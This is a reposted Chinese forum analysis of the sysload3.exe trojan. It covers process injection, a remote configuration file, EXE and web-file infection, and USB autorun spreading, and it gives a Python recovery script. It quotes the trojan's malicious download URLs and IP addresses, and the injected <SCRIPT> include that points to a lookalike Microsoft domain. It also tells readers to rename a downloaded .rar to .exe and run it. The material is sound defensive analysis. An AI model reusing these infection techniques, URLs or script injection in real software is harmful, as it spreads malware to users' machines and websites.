Sysload3.exe trojan virus Location Analysis and Removal Methods


Reproduced from the blog of a netizen of the Shuimu community:
http://codinggg.spaces.live.com/blog/cns!8ff03b6be1f29212!689.entry

The tool below applies to sysload3.exe v1.0.6 and restores infected EXE programs. For infected ASP, ASPX, HTM, HTML, JSP and PHP files, simply replace the injected feature string.
http://mumayi1.999kb.com/pic/2007-04-02/b6z4d6al8r5e9d6t44dn.rar

Note: the hosting space does not allow EXE files, so download the file and change its extension from .rar to .exe.

Before using the tool, delete sysload3.exe from the system directory and use IceSword to delete the dynamic libraries it dropped under the temporary directory. Once there are no iexplore.exe or notepad.exe processes left running on the machine, you can run the recovery program.

Note: do not run other programs while it is running; the program you start may itself be infected!!

I came back from working overtime yesterday afternoon and found my machine behaving quite strangely. Looking at the Task Manager, several ie processes and several notepad processes looked suspicious. Then I looked at the Registry and found a new startup item: sysload3.exe, sitting in the Windows System directory. Alas, I don't use anti-virus software; usually a trojan just quietly does its thing and that's that. This one, however, is annoying and gets in the way of using the machine. A trojan like that is unbelievable: every user can tell something is interfering. What kind of trojan is that! I don't know what the author was thinking ~~

So annoying, let's fuck him! Don't worry, IDA is ready. I analyzed version 1.0.6; the program logic is relatively simple. Let's see what he has done ~~
1. On start, it creates a startup item in the Registry ("System Boot Check"), grants itself debug privilege, and then creates an iexplore.exe process and a notepad.exe process.

2. Naturally, code is injected into the remote processes ~~. The author's injection method is relatively simple: at build time he changed the image base from the usual 0x400000 to a very uncommon address (0x13150000), presumably after checking that the address is unused in notepad and iexplore. Then, from the PE header, it obtains the required image size (0x7000), allocates that much space in iexplore and notepad, and copies the entire program over. Because of the fixed base, no address relocation is needed. Finally comes the Trojan's favourite function: CreateRemoteThread ~~

3. Once that job is done, sysload3.exe has nothing more to do. The next acts belong to iexplore and notepad ~.

4. iexplore goes to work first. Meanwhile notepad has an important task of its own: it checks whether it is running as the original body or as an infected host file. If it is an infected host, it releases and runs the pre-infection program so that the user does not notice anything. Then its thread waits for a notification (a named event: mysignal). What is iexplore doing in the meantime? Let's take a look.

5. iexplore (the name is really long, so I'll just call it ie from here on ~) first creates a named mutex, mydownload, telling any later instance: I'm already here, you can rest ~. It creates the mysignal event and leaves it in the non-signalled state. Then the real work starts: ie's task is to fetch the latest configuration for the virus and update the local copy according to it. First it downloads the configuration file from http://a.2007ip.com/css.css and saves it as config.ini.
The format of the configuration file, with my notes, is as follows:
[Config]
Version = 1.0.6
Num = 7 ; number of tasks (up to 20), listed below. Each task downloads the file and saves it locally as an .exe of the same name.
1 = http://61.153.247.76/cald/01.gif
2 = http://61.153.247.76/cald/02.gif
3 = http://61.153.247.76/cald/03.gif
4 = http://61.153.247.76/cald/04.gif
5 = http://61.153.247.76/cald/05.gif
6 = http://61.153.247.76/cald/06.gif
7 = http://61.153.247.76/cald/07.gif
Updateme = http://a.2007ip.com/5949645046.exe ; updates sysload3.exe itself
Tongji = http://if.iloveck.com/test/tongji.htm ; alas, statistics. Does the author think this thing is so awesome that he has to count installs? ....
Hos = http://if.iloveck.com/test/hos.gif ; this one is amazing! The author has collected a long list of rogue website names and hands them out for free along with the Trojan.
These websites get blocked: all of them are written into the hosts file, so they no longer resolve correctly! Whether the author's intention is to fight competitors (other Trojans ~) or genuinely to serve the people is unclear, but either way, well done, author ~~!! Even after the trojan is killed I will keep using this feature; I expect the author will keep updating it ~ Haha ~~

Okay. After all the tasks are completed, ie takes a break ~~

6. notepad's turn.
This bad guy is up to no good from the start ~. From drive Z down to drive A it infects files indiscriminately: EXE, ASP, ASPX, HTM, HTML, PHP and so on. This is the part of the trojan that annoys me most.
A. Its EXE infection process is as follows (don't use this to do anything bad!):
First it traverses all files. When it finds an EXE it checks whether its last 4 bytes are 0x12345678. If so, this one is already a brother; on to the next.
What if it finds one that is not yet infected? Naturally, it infects him ~~ Hahaha ~~~. Here is the key part: it copies sysload3.exe and calls the copy tempicon.exe. Why "icon"? Don't worry, the reason follows right away. Once tempicon exists, it extracts the target program's icon resource and inserts it into tempicon, so that tempicon looks like the target ~. The target program itself must also be kept, so a tempload.exe is produced: this file is a copy of tempicon with the target program appended after it. Finally 8 bytes of identification information are added: the first four bytes give the length of the Trojan stub, the last four are the 0x12345678 mentioned above;
B. Web-related files are handled similarly; the temporary file is temphtml ~. A rogue JavaScript include is inserted into the middle of the file: <SCRIPT src=http://macr.microfsot.com/Noindex.js></SCRIPT>


After the entire hard disk has been infected it idles, checking every 50 seconds for newly mounted drives such as USB flash drives or floppy disks. When one appears, it generates an autorun.inf in the root directory and copies sysload3.exe there; this part is relatively simple.

Oh, and it seems the partition holding the system directory is not traversed.

Well, that's the job done!

That is the basic process ~. To recover files you only need to write a small program that traverses the EXE files on the disk, reads the length of the sysload stub from the marker at the end of the file (the stub length is the 4 bytes at offsets -8 to -4 from the end, and the infection check is whether the last 4 bytes are 0x12345678), and cuts the stub out; that restores the file ~~~~ For the other libraries such as gizo0.dll, lgsy0.dll, msxo0.dll and rav1_dll, use IceSword to unload them from the explorer process and then delete them ~!
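As an added example (not the post's own recovery tool, whose source is only in the attachment), here is that recovery logic in Python, covering both the EXE layout and the web-file feature string described above. The little-endian encoding of the 8-byte trailer and the exact spacing and quoting of the injected <SCRIPT> tag are assumptions, so the tag is matched loosely.

```python
import os
import re
import struct
from typing import Optional, Tuple

# Trailer appended by sysload3.exe: 4-byte stub length, then the 4-byte marker.
# Little-endian layout is assumed, the natural encoding for a Win32 program.
MARKER = struct.pack("<I", 0x12345678)
TRAILER_LEN = 8
WEB_EXTS = (".asp", ".aspx", ".htm", ".html", ".jsp", ".php")
# The include injected into web files; spacing and quoting are assumed, so match loosely.
INJECTED_SCRIPT = re.compile(
    rb"<SCRIPT\s+src\s*=\s*[\"']?http://macr\.microfsot\.com/Noindex\.js[\"']?\s*>\s*</SCRIPT>",
    re.IGNORECASE)


def is_infected_exe(data: bytes) -> bool:
    """The same check the trojan uses: the last 4 bytes equal 0x12345678."""
    return len(data) > TRAILER_LEN and data[-4:] == MARKER


def recover_exe(data: bytes) -> Optional[bytes]:
    """Drop the stub at the front and the 8-byte trailer; None if not a sane infected image."""
    if not is_infected_exe(data):
        return None
    stub_len = struct.unpack("<I", data[-TRAILER_LEN:-4])[0]
    if stub_len == 0 or stub_len + TRAILER_LEN >= len(data):
        return None  # trailer claims more stub than the file holds: corrupt, leave it alone
    return data[stub_len:-TRAILER_LEN]


def clean_web_file(data: bytes) -> Tuple[bytes, int]:
    """Strip every injected <SCRIPT> include; returns (cleaned data, number removed)."""
    return INJECTED_SCRIPT.subn(b"", data)


def clean_by_name(name: str, data: bytes) -> Optional[bytes]:
    """Return repaired content for an infected file, or None if nothing needs changing."""
    ext = os.path.splitext(name)[1].lower()
    if ext == ".exe":
        return recover_exe(data)
    if ext in WEB_EXTS:
        cleaned, removed = clean_web_file(data)
        return cleaned if removed else None
    return None
```

Wire clean_by_name to an os.walk over each drive and write the result back only when it is not None; that is the whole recovery program.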

Overall, the idea of giving a Trojan a configuration file is quite good ~ when a new Trojan is developed, just have them download it ~ Haha. However, whenever the author uses CreateFile he compares the return value with 0, which is strange ~ shouldn't it be INVALID_HANDLE_VALUE??? The possibility that the author doesn't know can be ruled out, since he compares against INVALID_HANDLE_VALUE when using FindFirstFile. Maybe I've read too few books; if anyone knows, please leave a message and tell me. Thank you ~~.

The analysis process is quite tedious ~ Fortunately the author didn't forget to attach a joke: "I will by one BMW this year!" If the author really does get a BMW out of this, won't that make us all much happier ~~ Hey ~~

The attachment is a statically built file. Watch for updates.
By Cui yanqu


~~~~~~~~~~
Attachment 2 is the removal tool from Jiangmin.

[This post was last edited by teyqiu]

Attachments
Downloads: 367
Sysload3_killer_20070402.zip (21.15 KB)
Downloads: 316
Aniwormkiller.zip (123.11 KB)
